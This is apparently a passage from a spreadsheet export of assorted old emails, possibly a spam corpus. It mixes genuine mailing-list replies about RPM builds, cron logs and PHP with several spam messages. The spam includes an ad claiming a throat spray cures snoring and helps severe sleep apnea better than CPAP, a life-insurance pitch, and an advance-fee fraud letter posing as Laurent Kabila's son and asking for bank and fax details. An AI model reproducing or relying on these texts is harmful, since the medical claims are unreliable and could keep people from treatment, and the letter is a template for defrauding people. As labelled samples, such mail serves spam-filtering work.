 &lt;p&gt;Most people who snore have a &lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;shortage
 of oxygen&lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt; for a
 significant portion of that person's life. In recent studies, daytime fatigue
 and cardiovascular disorder are related to snoring. In a few cases, heavy
 snoring is a sign of potentially life -threatening problem. Sleep apnea in which
 breathing stops for a second or even minutes at a time and finally resumes with
 snorting and tossing around. This pattern may be repeated hundreds of times all
 night long. The result is chronic oxygen shortage, which leads to abnormal heart
 rhythms, high blood pressure, and heart strain.&lt;/p&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;
 &lt;p&gt;How the Snore Eliminator works!&lt;/p&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 &lt;p&gt;Snore Eliminator offers a unique break through with its all &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;natural
 enzymes&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt; which metabolize the
 secretions, allowing the body to absorb them into the back of the throat. The
 herbs reduce tissue swelling. The result is to open the airway and smooth the
 airflow. This in turn eliminates the snoring for hours at a time. It also&lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;
 reduces the noise&lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt; made by
 breathing through the mouth while sleeping&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;.
 By simply spraying the back of the throat, tongue and uvula with our special
 formula, manufactured using our patented break through process, the soft tissue
 is coated. This allows the&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;throat
 a chance to relax&lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt; thus a
 reduced amount of snoring. In most cases snoring is eliminated. Snore Eliminator
 coats the throat area with a unique patented process of all natural lubricants.&lt;/p&gt;
 &lt;b&gt;
 &lt;p&gt;TESTIMONIALS from several of our satisfied customers:&lt;/p&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font FACE="Times New Roman" COLOR="#ff0000"&gt;
 &lt;p&gt;Lorenzo writes...&lt;/p&gt;
 &lt;p&gt;I am having a good nights sleep, finally. I used to wake myself up during the
 night which was a real bummer as I would not always go back to sleep. Sleeping
 through the night is great. Thanks a lot Snore Eliminator.&lt;/p&gt;
 &lt;p&gt;PS: My girlfriend loves it as much or more than I do.&lt;/p&gt;
 &lt;p&gt;Alex writes...&lt;/p&gt;
 &lt;p&gt;My husband uses it for another reason. He has a problem with blocked nasal
 passages. While he's asleep the passages close, he stops breathing and he wakes
 up gasping. When he takes Snore Eliminator his nose stays clearer and he's able
 to sleep more restfully.&lt;/p&gt;
 &lt;p&gt;Thank you for a product that has really helped us!&lt;/p&gt;
 &lt;p&gt;Glen writes...&lt;/p&gt;
 &lt;p&gt;In February 1995, I was diagnosed with severe sleep apnea. A CPAP was the
 suggested treatment for my affliction, but it did not help my condition. I heard
 your advertisement and ordered a bottle of Snore Eliminator and my sleep
 improved immediately. I continue to use it and my sleep has been better than it
 had been in years. Thanks.&lt;/p&gt;
 &lt;p&gt;Steve writes...&lt;/p&gt;
 &lt;p&gt;Let me take this opportunity to thank you for your wonderful product and tell
 you how much my wife, Tracy, and I appreciate the quiet nights we have enjoyed
 since discovering it. It's very rare when a product actually delivers what it
 promises but Snore Eliminator truly does. We have tried most of the other
 advertised remedies without any satisfaction and I am very pleased to be able to
 write and say that this product is as close as you can get to an absolute
 &amp;quot;Miracle&amp;quot;.&lt;/p&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;
 &lt;p&gt;If you have a snoring problem what can you do?&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 Who would you turn to? Look no further, the answer to your snoring problems are
 over. Let our patented&lt;b&gt; Snoring Eliminator&lt;/b&gt; help you get through those
 sleepless nights. We guarantee it. In fact, we are so confident in Snore
 Eliminator that if you are not 100% satisfied with it you can return the unused
 portion for a full refund, no questions asked*&lt;/p&gt;
 &lt;p&gt;It is estimated that 90 million Americans, over the age of 18,suffer from
 habitual snoring.&lt;/p&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#800000"&gt;
 &lt;p&gt;How to Use Snore Eliminator:&lt;/p&gt;
 &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 &lt;p&gt;Open your mouth&lt;/p&gt;
 &lt;p&gt;Hold the 4oz bottle about four inches from your open mouth&lt;/p&gt;
 &lt;p&gt;Spray one or two application onto the back of the throat.&lt;/p&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 &lt;p&gt;Snore Eliminator is safe to use nightly because of its' natural ingredients.&lt;/p&gt;
 &lt;p&gt;Please note as with any health-related product, it is recommended that you
 consult with your physician prior to use if you have any medical conditions.&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;b&gt;
 &lt;p&gt;A Money Back Guarantee! *&lt;/p&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 &lt;p&gt;We are so confident in Snore Eliminator that we offer a 30-day money back
 guarantee. Merely return the unused portion of Snore Eliminator within 30 days
 and we will refund your purchase price with no questions asked!&lt;/p&gt;
 &lt;p&gt;Our normal price for Snore Eliminator is $39.95, but for a limited time only,
 you can purchase it for only &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#800040"&gt;$21.00
 plus $4.95 &lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;for shipping
 handling. We will also continue to offer you Snore Eliminator at this low price
 as long as you purchase from us in the future. To take advantage of this savings
 you must order within the next 10 days.&lt;/p&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font FACE="Times New Roman"&gt;
 &lt;p&gt;For Shipping OUTSIDE the US please add $11.00.&lt;/font&gt;&lt;b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;&lt;/p&gt;
 &lt;p&gt;Here's How to order&lt;/p&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;
 &lt;p&gt;***********************************************************************&lt;/p&gt;
 &lt;p&gt;ORDER TODAY:&lt;/p&gt;
 &lt;p&gt;SEND Only $25.95 US&lt;/p&gt;
 &lt;p&gt;(CREDIT CARD, CASH, CHECK, OR MONEY ORDER)&lt;/p&gt;
 &lt;p&gt;For Shipping OUTSIDE the US please add $11.00.&lt;/p&gt;
 &lt;p&gt;or&lt;/p&gt;
 &lt;p&gt;2 MONTH SUPPLY for only $42.00!&lt;/p&gt;
 &lt;p&gt;**This is a savings of $4.95 per bottle!!&lt;/p&gt;
 &lt;p&gt;For Shipping OUTSIDE the US please add $11.00.&lt;/p&gt;
 &lt;p&gt;(CREDIT CARD, CASH, CHECK, OR MONEY ORDER)&lt;/p&gt;
 &lt;p&gt;Shipping is included!&lt;/p&gt;
 &lt;p&gt;To place your order merely fill out the following form and fax to 1-&lt;/font&gt;&lt;font FACE="Times New Roman" COLOR="#0000a0"&gt;775-898-9.0.5.1&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;.&lt;/p&gt;
 &lt;p&gt;If this line is busy, please try faxing to 1-&lt;/font&gt;&lt;font FACE="Times New Roman" COLOR="#0000a0"&gt;253-541-0.0.7.9&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;.&lt;/p&gt;
 &lt;p&gt;or mail to:&lt;/p&gt;
 &lt;p&gt;Internet Information Services&lt;/p&gt;
 &lt;p&gt;PO Box 21442&lt;/p&gt;
 &lt;p&gt;Billings, MT 59104&lt;/p&gt;
 &lt;p&gt;(ALL ORDERS FILLED WITHIN 24 HOURS OF RECEIVING THEM)&lt;/p&gt;
 &lt;p&gt;Please allow 7 days for delivery.&lt;/p&gt;
 &lt;p&gt;*************************&lt;/p&gt;
 &lt;p&gt;Credit Card Order Form&lt;/p&gt;
 &lt;p&gt;Name on Credit Card:&lt;/p&gt;
 &lt;p&gt;Address:&lt;/p&gt;
 &lt;p&gt;City/State/ZIP:&lt;/p&gt;
 &lt;p&gt;Your email address:&lt;/p&gt;
 &lt;p&gt;++++++++++++++++++++++++++++++++++++++++&lt;/p&gt;
 &lt;p&gt;PLEASE CIRCLE ONE for the quantity you wish to order.&lt;/p&gt;
 &lt;p&gt;Please send me a ONE month supply for $25.95&lt;/p&gt;
 &lt;p&gt;For Shipping OUTSIDE the US please add $11.00.&lt;/p&gt;
 &lt;p&gt;Please send me a TWO month supply for $42.00&lt;/p&gt;
 &lt;p&gt;For Shipping OUTSIDE the US please add $11.00.&lt;/p&gt;
 &lt;p&gt;(This is a savings of $13.90 off our regular price.)&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Credit Card Number:&lt;/p&gt;
 &lt;p&gt;Date Credit Card Expires:&lt;/p&gt;
 &lt;p&gt;If you do not receive your order within 10 days, please send us a fax letting
 us know of the late arrival.&lt;/p&gt;
 &lt;p&gt;We will then contact you to figure out why you have not received your order.&lt;/p&gt;
 &lt;p&gt;Please tell us your phone Number:&lt;/p&gt;
 &lt;p&gt;Please tell us your fax Number:&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;To order by Check or Money Order:&lt;/p&gt;
 &lt;p&gt;MAKE YOUR CHECK PAYABLE TO:&lt;/p&gt;
 &lt;p&gt;Internet Information Services&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Name:&lt;/p&gt;
 &lt;p&gt;Address:&lt;/p&gt;
 &lt;p&gt;City/State/ZIP:&lt;/p&gt;
 &lt;p&gt;E-mail Address:&lt;/p&gt;
 &lt;p&gt;If you do not receive your order within 10 days, please send us a fax letting
 us know of the late arrival.&lt;/p&gt;
 &lt;p&gt;We will then contact you to figure out why you have not received your order.&lt;/p&gt;
 &lt;p&gt;Please tell us your phone Number:&lt;/p&gt;
 &lt;p&gt;Please tell us your fax Number:&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Thank you for your business,&lt;/p&gt;
 &lt;p&gt;Internet Information Services&lt;/p&gt;
 &lt;p&gt;PO Box 21442&lt;/p&gt;
 &lt;p&gt;Billings, MT 59104&lt;/p&gt;
 &lt;p&gt;Fax to 1-&lt;/font&gt;&lt;font FACE="Times New Roman" COLOR="#0000a0"&gt;775-898-9.0.5.1&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;.
 If this line is busy, please try faxing to 1-&lt;/font&gt;&lt;font FACE="Times New Roman" COLOR="#0000a0"&gt;253-541-0.0.7.9&lt;/font&gt;&lt;font FACE="MS Sans Serif" COLOR="#0000a0"&gt;.&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Copyright (c) 1997-2000&lt;/p&gt;
 &lt;p&gt;All Rights Reserved&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/font&gt;&lt;font FACE="MS Sans Serif" SIZE="2" COLOR="#0000a0"&gt;
 &lt;p&gt;++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br&gt;
 This ad is produced and sent out by:&lt;br&gt;
 Universal Advertising Systems&lt;br&gt;
 To be removed from our mailing list please email us at&lt;br&gt;
 vanessagreen@freeze.com with remove in the subject line or&lt;br&gt;
 call us toll free at 1-88.8-60.5-2.4.8.5 and give us your email address or
 write us at:&lt;br&gt;
 Central D B R e m o v a l, PO Box 12 00, Oranje.st.ad, Ar.ub.a&lt;br&gt;
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++&lt;/p&gt;
 &lt;/font&gt;
 &lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;font face='MS Sans Serif' size=-4 color='#c0c0c0'&gt;Content-Transfer-Encoding: 7BIT&lt;/font&gt;&lt;/center&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Harig, wrote :
 &gt; &gt; 
 &gt; &gt; The workaround is to pass an extra argument to configure as follows :
 &gt; &gt; 
 &gt; &gt; %configure --program-prefix=%{?_program_prefix:%{_program_prefix}}
 &gt; &gt; 
 &gt; 
 &gt; This works when you are defining a switch that %configure
 &gt; does not already define, but how can we override an
 &gt; existing switch?
 Well, %configure doesn't define "--program-prefix=", so that's why it
 works. Maybe you thought that was an example, but no, it's the exact syntax
 to use as a workaround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</si>
  <si>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Subject: ADV: Life Insurance - Pennies a day! -- FREE Quote inbeq
</t>
  </si>
  <si>
    <t xml:space="preserve">Low-Cost Term-Life Insurance!
 SAVE up to 70% or more on your term life insurance policy now.
 CLICK HERE NOW For your FREE Quote!
  http://hey11.heyyy.com/insurance/
 Example: Male age 40 - $250,000 - 10 year level term - as low as $11 per month.
 If you haven't taken the time to think about what you are paying for life insurance...now is the time!!!
 We offer the lowest rates available from nationally recognized carriers.
 Act now and pay less!
 CLICK HERE 
 http://hey11.heyyy.com/insurance/
 ++++++++++++++++++++++++++++
 Simple Removal instructions:
 To be removed from our in-house list simply visit
 http://hey11.heyyy.com/removal/remove.htm
 Enter your email addresses to unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">REQUEST FOR URGENT BUSINESS ASSISTANCE
 --------------------------------------
 I stumbled into your contact by stroke of luck after a
 long search for an honest and trust worthy person who 
 could handle issue with high confidentiality.
 I was so dilghted when i got your contact and i decided
 to contact you  and solicite for your kind assistance.
 i hope you will let this issue to remain confidential even
 if you are not interested because of my status.
 I am Laurent Mpeti Kabila (Jnr) the second son of
 Late President LAURENT DESIRE KABILA the immediate
 Past president of the DEMOCRATIC REPUBLIC OF CONGO in
 Africa who was murdered by his opposition through his personal
 bodyguards in his bedroom on Tuesday 16th January, 2001.
 I have the privilege of being mandated by my father,s 
 colleagues to seek your immediate and urgent co-operation 
 to receive into your bank account the sum of US $25m.
 (twenty-five million Dollars) and some thousands carats
 of Diamond. This money and treasures was lodged in a vault with a
 security firm in Europe and South-Africa.
 SOURCES OF DIAMONDS AND FUND
 In August 2000, my father as a defence minister and
 president has a meeting with his cabinet and armychief about the
 defence budget for 2000 to 2001 which was US $700m. 
 so he directed one of his best friend. Frederic Kibasa Maliba
 who was a minister of mines and a political party leader known
 as the Union Sacree de,opposition radicale et ses allies (USORAL)
 to buy arms with US $200m on 5th January 2001; for him to finalize
 the arms deal,my father was murdered. f.K. Maliba (FKM) and I have
 decided to keep the money with a foreigner after which he will use
 it to contest for the political election. Inspite of all this we
 have resolved to present you or your company for the firm to pay 
 it into your nominated account the above sum and diamonds. 
 This transaction should be finalized within seven (7) working 
 days and for your co-operation and partnership, we have unanimously 
 agreed that you will be entitled to 5.5% of the money when successfully 
 receive it in your account. The nature of your business is not relevant to 
 the successful execution of this transaction what we require is your 
 total co-operation and commitment to ensure 100%risk-free transaction at 
 both ends and to protect the persons involved in this transaction  strict
 confidence and utmost secrecy is required even after the uccessful conclusion 
 of this transaction. If this proposal is acceptable to you, kindly provide me
 with your personal telephone and fax through my E-mail box for immediate
 commencement of the transaction. I count on your honour to keep my
 secret, SECRET.
 Looking forward for your urgent reply
 Thanks.
 Best Regards
 MPETI L. KABILA (Jnr)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Wynne, Conor wrote:
 &gt; Hi ladies,
 &gt; 
 &gt; I setup a cron job to do a full backup to tape drive there last night, but
 &gt; I'm just wondering how I can verify that it actually ran? 
 &gt; I suppose that a mail will be sent to root as I ran crontab -e as root. Is
 &gt; that correct or should I be looking elsewhere?
 /var/log/cron
 Logs user, name of job run, and pid it ran as.
 Regards,
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?=A4=A3=AC=DD=B7|=AB=E1=AE=AC?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_KynqjnFRvzmqYGilyuyHYQ
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_KynqjnFRvzmqYGilyuyHYQAA"
 ------=_NextPart_KynqjnFRvzmqYGilyuyHYQAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 DQo8aHRtbD4NCg0KPGhlYWQ+DQo8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5cGUiIENPTlRF
 TlQ9InRleHQvaHRtbDtjaGFyc2V0PWJpZzUiPg0KPCEtLSBzYXZlZCBmcm9tIHVybD0oMDAyMilo
 dHRwOi8vaW50ZXJuZXQuZS1tYWlsIC0tPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBl
 IiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFU
 T1IiIGNvbnRlbnQ9Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4wIj4NCjxtZXRhIG5hbWU9IlByb2dJ
 ZCIgY29udGVudD0iRnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+r1G+frtQqN+k
 bDwvdGl0bGU+DQo8L2hlYWQ+DQoNCjxib2R5Pg0KDQo8dGFibGUgYm9yZGVyPSIxIiBjZWxscGFk
 ZGluZz0iMCIgY2VsbHNwYWNpbmc9IjAiIHN0eWxlPSJib3JkZXItY29sbGFwc2U6IGNvbGxhcHNl
 OyBib3JkZXItd2lkdGg6IDAiIGJvcmRlcmNvbG9yPSIjMTExMTExIiB3aWR0aD0iMTAwJSIgaWQ9
 IkF1dG9OdW1iZXIxIiBoZWlnaHQ9IjIwNSI+DQogIDx0cj4NCiAgICA8dGQgd2lkdGg9IjEwMCUi
 IGhlaWdodD0iMjA1IiBzdHlsZT0iYm9yZGVyLXN0eWxlOiBub25lOyBib3JkZXItd2lkdGg6IG1l
 ZGl1bSIgYmdjb2xvcj0iI0ZGRkY5OSI+DQo8cCBhbGlnbj0iY2VudGVyIj48Yj48Zm9udCBmYWNl
 PSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMDgwIj6ms6RAsKavUb5+vuOk0bROp6SmYr7w
 pFehQab9tE6sT6SjsLWoxqFDPC9mb250PjwvYj48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Yj48
 Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMDgwIj6kp6vhtE6ms6RAsKao
 36RsrN2o7K9Rvn6hQbROsN27oaFHPC9mb250PjwvYj48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48
 Yj48Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMDgwIj6n2q/gvsenQbNv
 vMukbLROp6SmYrNvqOC+46TRpKOlzrC1qMa23D88L2ZvbnQ+PC9iPjwvcD4NCjxwIGFsaWduPSJj
 ZW50ZXIiPjxiPjxmb250IGZhY2U9IrzQt6LF6SIgc2l6ZT0iNCIgY29sb3I9IiMwMDAwODAiPq9R
 vn60TruhsNWhR7fttU2laaVIoUGssNSjpKOm5qFIPC9mb250PjwvYj48L3A+DQo8cCBhbGlnbj0i
 Y2VudGVyIj48Yj48Zm9udCBmYWNlPSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjMDAwMDgwIj6p
 0qVIoUGo36RstE6mYr7wqrqps6RVpfCup7BfqNOhQTwvZm9udD48L2I+PC9wPg0KPHAgYWxpZ249
 ImNlbnRlciI+PGI+PGZvbnQgZmFjZT0ivNC3osXpIiBzaXplPSI0IiBjb2xvcj0iIzAwMDA4MCI+
 rPC1Taq6oUGms6RAsKaqsK9XpViye6fiqN+kbLW5plmkRqFDPC9mb250PjwvYj48L3A+DQogICAg
 PC90ZD4NCiAgPC90cj4NCjwvdGFibGU+DQo8cCBhbGlnbj0iY2VudGVyIj48Yj48Zm9udCBmYWNl
 PSK80LeixekiIHNpemU9IjQiIGNvbG9yPSIjRkYwMEZGIj6zb6xHqManabZEp0GhRzwvZm9udD48
 L2I+PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iQXJpYWwgVW5pY29kZSBNUyIg
 c2l6ZT0iNCIgY29sb3I9IiNGRjAwMDAiPjxiPq1Zp0G3Ua1uvuOk0aektduko7C1qMahQadBtE6l
 sra3sKqwqqZipFehQzwvYj48L2ZvbnQ+PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFj
 ZT0iQXJpYWwgVW5pY29kZSBNUyIgc2l6ZT0iNCI+v8u3Uqq6qkKkzTxmb250IGNvbG9yPSIjODAw
 MDgwIj6hQTwvZm9udD48L2ZvbnQ+PGZvbnQgZmFjZT0ipOW5qaVqpkzF6SI+PGI+PGZvbnQgY29s
 b3I9IiMwMDAwODAiIHNpemU9IjUiPqdBpEClzaSwu/Kuya3UpH6v4LD3sKqwqqZipFepTz88L2Zv
 bnQ+PC9iPjwvZm9udD48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBzaXplPSI0IiBjb2xv
 cj0iIzgwMDA4MCI+PGZvbnQgZmFjZT0iQXJpYWwgVW5pY29kZSBNUyI+pECt06VppUiwqrCqpmKk
 V6q6ICAgICAgDQonJ773t3wnJzwvZm9udD48L2ZvbnQ+PGZvbnQgY29sb3I9IiNmZmZmOTkiIGZh
 Y2U9IkFyaWFsIFVuaWNvZGUgTVMiIHNpemU9IjUiPiA8aT4NCjxhIGhyZWY9Imh0dHA6Ly9ob21l
 LmtpbW8uY29tLnR3L2tldmluMTU3a2ltby9ud2xpYS5odG1sIj5odHRwOi8vaG9tZS5raW1vLmNv
 bS50dy9rZXZpbjE1N2tpbW8vbndsaWEuaHRtbDwvYT48L2k+PC9mb250PjwvcD4NCjxwIGFsaWdu
 PSJjZW50ZXIiPjxmb250IGZhY2U9IqTluamlaqZMxekiIGNvbG9yPSIjMDAwMEZGIiBzaXplPSI0
 Ij6mcKpHpmKlSrLTrN2nuavhprO/s73sLDxzcGFuIHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOiAj
 ZmZmZmZmIj6n2q3MtKOo0Twvc3Bhbj48c3BhbiBzdHlsZT0iQkFDS0dST1VORC1DT0xPUjogI2Zm
 ZmZmZiI+uvS49KbmvlC46re9PC9zcGFuPjwvZm9udD48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48
 Zm9udCBmYWNlPSKk5bmppWqmTMXpIiBjb2xvcj0iIzAwMDBGRiIgc2l6ZT0iNCI+PHNwYW4gc3R5
 bGU9IkJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmYiPqdBpKOlsqnIqFOms6RIr98spXWtbqdBprOo
 TaTfxEC3Trjyp9qtzKRAsF+nVqRPPC9zcGFuPjwvZm9udD48L3A+DQo8cCBhbGlnbj0iY2VudGVy
 Ij48c3BhbiBzdHlsZT0iQkFDS0dST1VORC1DT0xPUjogI2ZmZmZmZiI+PGZvbnQgZmFjZT0ipOW5
 qaVqpkzF6SIgY29sb3I9IiMwMDAwRkYiIHNpemU9IjQiPqZiPC9mb250Pjxmb250IGZhY2U9IqTl
 uamlaqZMxekiIGNvbG9yPSIjRkYwMDAwIiBzaXplPSI0Ij6ps8F+q0+72SgyNTAwMKS4KTwvZm9u
 dD48Zm9udCBmYWNlPSKk5bmppWqmTMXpIiBjb2xvcj0iIzAwMDBGRiIgc2l6ZT0iNCI+pM63fsFa
 pqiq+KRVLKdBsU6mszwvZm9udD48L3NwYW4+PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PHNwYW4g
 c3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmYiPjxiPjxmb250IGZhY2U9IqTluamlaqZM
 xekiIGNvbG9yPSIjRkYwMDAwIiBzaXplPSI0Ij6t06RIqrqxTcTduvSvuDwvZm9udD48L2I+PGZv
 bnQgZmFjZT0ipOW5qaVqpkzF6SIgY29sb3I9IiMwMDAwRkYiIHNpemU9IjQiPqTOPC9mb250Pjxm
 b250IGZhY2U9IqTluamlaqZMxekiIGNvbG9yPSIjRkYwMDAwIiBzaXplPSI0Ij48Yj61TK2tqrq6
 9Lj0pEiv3zwvYj48L2ZvbnQ+PGZvbnQgZmFjZT0ipOW5qaVqpkzF6SIgY29sb3I9IiMwMDAwRkYi
 IHNpemU9IjQiPiyn1qVbpEqn2q3Mqrq5zrakPC9mb250Pjwvc3Bhbj48L3A+DQo8cCBhbGlnbj0i
 Y2VudGVyIj48Zm9udCBmYWNlPSKk5bmppWqmTMXpIiBzaXplPSI0Ij48Zm9udCBjb2xvcj0iIzAw
 MDBGRiI+Jm5ic3A7Jm5ic3A7Jm5ic3A7IDwvZm9udD4gDQo8c3BhbiBzdHlsZT0iQkFDS0dST1VO
 RC1DT0xPUjogI2ZmZmZmZiI+PGZvbnQgY29sb3I9IiMwMDAwRkYiPg0KvdCmYrr0r7ivZKRVuOqu
 xqFBp9qtzLFOvqizdLtQsXrBcLW4oUk8L2ZvbnQ+oUk8L3NwYW4+PC9mb250PjwvcD4NCjxwIGFs
 aWduPSJjZW50ZXIiPjxmb250IGZhY2U9IkFyaWFsIFVuaWNvZGUgTVMiIHNpemU9IjUiPg0KICAg
 ICAgICA8YSB0YXJnZXQ9Im5ldyIgaHJlZj0iaHR0cDovL3d3dy5vbmxpbmUudGFpaG9vLmNvbS9l
 LXNob3AvYzAwMy9pbmRleC5odG0iPg0KPGZvbnQgY29sb3I9IiNGRjAwMDAiPqv2p9qhQb73t3y0
 TqxPp0GqujwvZm9udD48L2E+ICANCiAgICAgICAgpXS0o6jRuvS49K9TsFYsPGEgaHJlZj0iaHR0
 cDovL2hvbWUua2ltby5jb20udHcva2V2aW4xNTdraW1vL2UtbWFpbC5odG0iPjxmb250IGNvbG9y
 PSIjRkYwMDAwIj6z+KZXqu08L2ZvbnQ+PC9hPjwvZm9udD48L3A+DQo8cCBhbGlnbj0iY2VudGVy
 Ij48Zm9udCBjb2xvcj0iI2NjMDA2NiI+rVmko7dRpkGmrKjsprmryrZspfOhQb3Qq/amuTxhIGhy
 ZWY9Imh0dHA6Ly94LW1haWwuaDhoLmNvbS50dyIgdGFyZ2V0PSJuZXciPjxmb250IGZhY2U9IkFy
 aWFsIFVuaWNvZGUgTVMiPqF5uUzCb6tIpfOx0L7HoXo8L2ZvbnQ+PC9hPrNztbKhQav2t9OoQsZK
 s12pd7lMwm+muatIoUnBwsHCoUk8L2ZvbnQ+PC9wPg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=
 ------=_NextPart_KynqjnFRvzmqYGilyuyHYQAA--
 ------=_NextPart_KynqjnFRvzmqYGilyuyHYQ--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: TOMORROW -- Password: Soleil -- TV Casting
</t>
  </si>
  <si>
    <t xml:space="preserve">Tomorrow will be huge.  Password: Soleil has become the premiere Thursday night in New York - with a chill after-work and a blazing late-night.  This Thursday, producers from Columbia Tristar are casting people for their new reality TV show.  
 We invite all members of the media and entertainment industries for an exclusive event celebrating New York high-life.
 Password: SOLEIL
 Thursdays @Nativa
 5 East 19th Street
 b/w B'way &amp; 5th Ave.
 New York, NY
 "SOLEIL" REQUIRED FOR ENTRY
 You must say 'Soleil' at the door.
 $5 before 10pm
 6-8pm Happy Hour
 Free dinner buffet.
 1/2 price drinks.
 party 'til 4am
 Music: Hip-Hop, Reggae, Latin Soul, R&amp;B
 RSVP Recommended:
 212.591.1253
 password@thesoleilgroup.com
 ----------------
 To be removed from this list, email: remove@thesoleilgroup.com with the word "remove" in the subject heading. 
 ----------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I am a php programmer (very busy one at that - anglemail.org) but if someone
 gets to this before me, I would also love to se the code because I want my
 rpms site to be more user friendly.
 Matthias Saou (matthias@egwn.net) wrote*:
 &gt;
 &gt;Sorry, this hasn't got much to do with rpm packages directly ;-)
 &gt;
 &gt;My "builds" page is getting bigger and bigger, and quite messy as
 &gt;directories are listed in no particular order :
 &gt;http://freshrpms.net/builds/
 &gt;
 &gt;What I'd need is to have last modification date of the directory displayed
 &gt;next to the directory name (sort of like "mplayer - Thu Aug 1 2002"), and
 &gt;the list ordered to have the most recent entries at the top.
 &gt;
 &gt;Now, if there are php programmers on this list, I'd love to have their help
